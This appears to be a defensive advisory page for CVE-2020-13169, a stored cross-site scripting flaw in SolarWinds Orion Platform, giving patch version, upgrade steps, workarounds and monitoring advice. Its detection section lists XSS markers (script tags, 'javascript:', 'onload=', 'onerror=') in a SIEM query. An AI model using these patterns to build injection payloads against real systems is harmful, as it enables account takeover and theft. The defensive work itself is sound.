CVE-2020-13169
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in SolarWinds Orion Platform allows attackers to inject malicious scripts into multiple forms and pages. When exploited, it can lead to information disclosure and privilege escalation, potentially enabling administrator account takeover. Organizations running affected versions of SolarWinds Orion Platform are vulnerable.
💻 Affected Systems
- SolarWinds Orion Platform
📦 What is this software?
Orion Platform by Solarwinds
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the SolarWinds Orion environment, including administrator account takeover, data exfiltration, and lateral movement to connected systems.
Likely Case
Session hijacking, credential theft, and unauthorized access to sensitive monitoring data and network information.
If Mitigated
Limited impact with proper input validation, output encoding, and security controls in place.
🎯 Exploit Status
Stored XSS typically requires some level of access to inject payloads, but exploitation is straightforward once initial access is achieved.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2020.2.1 or later
Vendor Advisory: https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-1_release_notes.htm
Restart Required: Yes
Instructions:
1. Download SolarWinds Orion Platform 2020.2.1 or later from the SolarWinds customer portal. 2. Backup current configuration and database. 3. Run the installer with administrative privileges. 4. Follow the upgrade wizard. 5. Restart Orion services after installation completes.
🔧 Temporary Workarounds
Input Validation and Output Encoding
allImplement strict input validation and proper output encoding on all user-controllable inputs in the Orion web interface.
Content Security Policy
allImplement a strict Content Security Policy (CSP) header to mitigate XSS attacks.
🧯 If You Can't Patch
- Isolate SolarWinds Orion servers from internet access and restrict internal access to authorized users only.
- Implement web application firewall (WAF) rules to detect and block XSS payloads targeting Orion endpoints.
🔍 How to Verify
Check if Vulnerable:
Check Orion Platform version in the web interface under Settings > All Settings > Product Information.Check Version:
Not applicable - check via web interface or SolarWinds Orion Configuration WizardVerify Fix Applied:
Verify version is 2020.2.1 or later and test XSS payloads on previously vulnerable forms/pages.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to Orion forms with script tags or JavaScript payloads
- Multiple failed login attempts followed by successful login from unusual locations
Network Indicators:
- HTTP requests containing script tags or JavaScript to Orion endpoints
- Outbound connections from Orion server to unknown external IPs
SIEM Query:
source="orion_logs" AND (http_request="*<script>*" OR http_request="*javascript:*" OR http_request="*onload=*" OR http_request="*onerror=*")🔗 References
- https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-1_release_notes.htm#NewFeaturesOrion
- https://support.solarwinds.com/SuccessCenter/s/
- https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-1_release_notes.htm#NewFeaturesOrion
- https://support.solarwinds.com/SuccessCenter/s/
